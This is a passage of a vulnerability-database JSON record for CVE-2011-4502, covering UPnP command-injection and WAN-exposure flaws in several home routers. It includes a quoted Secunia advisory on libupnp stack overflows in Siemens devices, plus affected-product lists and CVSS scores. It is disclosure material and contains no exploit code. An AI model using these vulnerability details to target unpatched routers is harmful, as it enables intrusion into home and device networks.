"id": "CVE-2011-4503"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
],
"trust": 0.6
}
}
VAR-201111-0158
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to execute arbitrary commands via shell metacharacters. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, thereby exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP) compatible routers have vulnerabilities caused by insufficient access restrictions. On routers that support UPnP, there is a vulnerability that allows unintended UPnP requests arriving on the WAN-side interface to be accepted. An unauthenticated remote third party could obtain local network information or use the product as a proxy. There are vulnerabilities in the UPnP IGD implementation in Edimax EdiLinux. An attacker can exploit this issue to gain unauthorized access to scan internal hosts or proxy internet traffic through an affected device. The following devices are affected:
- Cisco Linksys WRT54G firmware version prior to 4.30.5
- Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1
- Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1
- Cisco Linksys WRT54GX firmware 2.00.05
- Edimax BR-6104K prior to 3.25
- Edimax 6114Wg
- Canyon-Tech CN-WF512 firmware version 1.83
- Canyon-Tech CN-WF514 firmware version 2.08
- Sitecom WL-153 prior to firmware 1.39
- Sitecom WL-111
- Sweex LB000021 firmware version 3.15
- ZyXEL P-330W
- SpeedTouch 5x6 firmware versions prior to 6.2.29
- Thomson TG585 firmware versions prior to 7.4.3.2.
----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0158",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lb000021 router",
"scope": "eq",
"trust": 3.0,
"vendor": "sweex",
"version": "3.15"
},
{
"model": "br-6104k",
"scope": null,
"trust": 1.4,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153",
"scope": null,
"trust": 1.4,
"vendor": "sitecom",
"version": null
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "3.21"
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.34"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "6114wg",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "lb000021",
"scope": "eq",
"trust": 1.0,
"vendor": "sweex",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "1.83"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "lt",
"trust": 0.8,
"vendor": "edimax",
"version": "3.25"
},
{
"model": "br-6114wg",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6114wg router",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153 router",
"scope": "lt",
"trust": 0.8,
"vendor": "sitecom",
"version": "1.39"
},
{
"model": "lb000021",
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 0.6,
"vendor": "edimax",
"version": "3.21/2.08/1.83"
},
{
"model": "6114wg",
"scope": null,
"trust": 0.6,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.6,
"vendor": "canyon tech",
"version": "2.08/1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.6,
"vendor": "canyon tech",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.6,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router /1.34 router",
"scope": "eq",
"trust": 0.6,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.3,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:br-6104k_router_firmware:3.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:br-6104k:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf512_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf514_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf514:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf512:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:6114wg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-153:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sweex:lb000021_router_firmware:3.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sweex:lb000021:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4502"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4502",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4502",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-52447",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4502",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-364",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-52447",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to execute arbitrary commands via shell metacharacters. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP) compatible routers have vulnerabilities with insufficient access restrictions. On routers that support UPnP, there is a vulnerability that allows unintended UPnP requests from the WAN-side interface to be accepted. An unauthenticated remote third party could obtain local network information or use the product as a proxy. There are vulnerabilities in the UPnP IGD implementation of Edimax EdiLinux. \nAn attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. 
\nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. 
\n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. 
This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
